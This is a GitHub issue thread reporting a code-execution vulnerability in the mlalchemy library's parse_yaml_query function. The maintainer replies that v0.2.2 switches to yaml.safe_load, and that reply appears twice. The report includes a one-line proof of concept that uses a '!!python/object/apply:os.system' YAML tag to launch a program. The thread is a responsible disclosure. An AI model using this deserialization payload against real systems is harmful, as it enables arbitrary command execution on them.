thanethomson
commented
6 years ago Thanks for reporting! Just released v0.2.2, now using yaml.safe_load() to load YAML content.
Closed Joel-MalwareBenchmark closed 6 years ago
thanethomson
commented
6 years ago Thanks for reporting! Just released v0.2.2, now using yaml.safe_load() to load YAML content.
from mlalchemy import parse_yaml_query parse_yaml_query('!!python/object/apply:os.system ["calc.exe"]')
Hi, there is a vulnerability in parse_yaml_query method in parser.py, please see PoC above. It can execute arbitrary python commands resulting in command execution.